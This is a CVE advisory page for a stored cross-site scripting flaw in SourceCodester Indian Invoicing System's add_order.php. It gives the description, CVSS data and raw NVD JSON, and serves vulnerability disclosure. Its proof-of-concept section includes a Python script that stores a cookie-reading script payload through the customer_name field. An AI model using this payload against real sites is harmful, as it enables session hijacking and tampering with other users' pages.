CVE-2026-9414

Description

A security flaw has been discovered in SourceCodester Indian Invoicing System up to 0.x/1.0. The impacted element is an unknown function of the file /Invoicing/add_order.php of the component Invoice Template Render Database-Backed. The manipulation of the argument customer_name results in cross site scripting. The attack may be launched remotely. The exploit has been released to the public and may be used for attacks.

CVSS Details

CVSS Score

3.5

Severity

LOW

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

SourceCodester Indian Invoicing System 0.x

SourceCodester Indian Invoicing System 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# Exploit Title: SourceCodester Indian Invoicing System Stored XSS PoC
# Description: Inject script into customer_name parameter

import requests

target_url = "http://target-site/Invoicing/add_order.php"
payload = "<script>alert(document.cookie);</script>"

# Prepare the data payload
data = {
    "customer_name": payload,
    # Include other necessary parameters for the order submission
    "amount": "100",
    "submit": "submit"
}

try:
    # Send the malicious request to store the payload
    response = requests.post(target_url, data=data)
    
    if response.status_code == 200:
        print("[+] Payload sent successfully.")
        print("[+] Navigate to the invoice rendering page to trigger the XSS.")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[-] An error occurred: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-9414
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-9414
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-9414/
[4] VulDB https://vuldb.com/cve/CVE-2026-9414
[5] https://gist.github.com/c4ttr4ck/97c5babe1f16fa3243333528a40b7550
[6] https://vuldb.com/submit/813610
[7] https://vuldb.com/vuln/365395
[8] https://vuldb.com/vuln/365395/cti
[9] https://www.sourcecodester.com/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-9414", "sourceIdentifier": "[email protected]", "published": "2026-05-25T02:16:57.310", "lastModified": "2026-05-25T02:16:57.310", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security flaw has been discovered in SourceCodester Indian Invoicing System up to 0.x/1.0. The impacted element is an unknown function of the file /Invoicing/add_order.php of the component Invoice Template Render Database-Backed. The manipulation of the argument customer_name results in cross site scripting. The attack may be launched remotely. The exploit has been released to the public and may be used for attacks."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.0, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N", "baseScore": 3.5, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 1.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N", "baseScore": 4.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "availabilityImpact": "NONE"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}, {"lang": "en", "value": "CWE-94"}]}], "references": [{"url": "https://gist.github.com/c4ttr4ck/97c5babe1f16fa3243333528a40b7550", "source": "[email protected]"}, {"url": "https://vuldb.com/submit/813610", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/365395", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/365395/cti", "source": "[email protected]"}, {"url": "https://www.sourcecodester.com/", "source": "[email protected]"}]}}